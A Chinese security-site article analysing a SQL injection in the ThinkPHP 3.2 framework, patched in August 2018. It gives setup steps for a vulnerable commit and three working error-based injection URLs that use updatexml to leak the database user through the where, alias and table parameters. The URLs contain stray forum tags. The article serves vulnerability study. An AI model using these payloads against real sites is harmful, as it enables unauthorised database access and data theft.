【0day漏洞】ThinkPHP3.2 框架sql注入漏洞分析

漏洞公布

【0day漏洞】ThinkPHP3.2 框架sql注入漏洞分析

时间:2018/10/11 8:35:28 作者:安琪 来自:www.aqfls.com 浏览:453 评论:0
内容摘要:北京时间2018年8月23号11:25分星期四,tp团队对于已经停止更新的thinkphp3系列进行了一处安全更新,经过分析,此次更新修正了由于select(),find(),delete()方法可能会传入数组类型数据产生的多个sql注入隐患。0x01漏洞复现下载源码:gitclonehttps://github.co...
【0day漏洞】ThinkPHP3.2_框架sql注入漏洞分析
北京时间 2018年8月23号11:25分 星期四,tp团队对于已经停止更新的thinkphp 3系列进行了一处安全更新,经过分析,此次更新修正了由于select(),find(),delete()方法可能会传入数组类型数据产生的多个sql注入隐患。
0x01 漏洞复现
下载源码: git clone https://github.com/top-think/thinkphp.git
使用git checkout 命令将版本回退到上一次commit:git checkout 109bf30254a38651c21837633d9293a4065c300b
使用phpstudy等集成工具搭建thinkphp,修改apache的配置文件httpd-conf
DocumentRoot "" 为thinkphp所在的目录。

【0day漏洞】ThinkPHP3.2_框架sql注入漏洞分析

重启phpstudy,访问127.0.0.1,输出thinkphp的欢迎信息,表示thinkphp已正常运行。

【0day漏洞】ThinkPHP3.2_框架sql注入漏洞分析

http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[/url][where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--alias: [url]http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[/url][where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--table: [url]http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[/url][table]=user%20where%201%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--&id[where]=1
【0day漏洞】ThinkPHP3.2_框架sql注入漏洞分析

 




标签:0day漏洞 ThinkPHP3.2注入漏洞 


本站所有资源默认解压密码:www.aqfls.com 如有问题请联系管理员说明


本站资源仅供学习参考,所有资源均来源于网络搜索及网友提供,所有言论并不代表本站立场

投诉与建议 文章投稿 E-mail:1437232096@qq.com

相关评论
加载中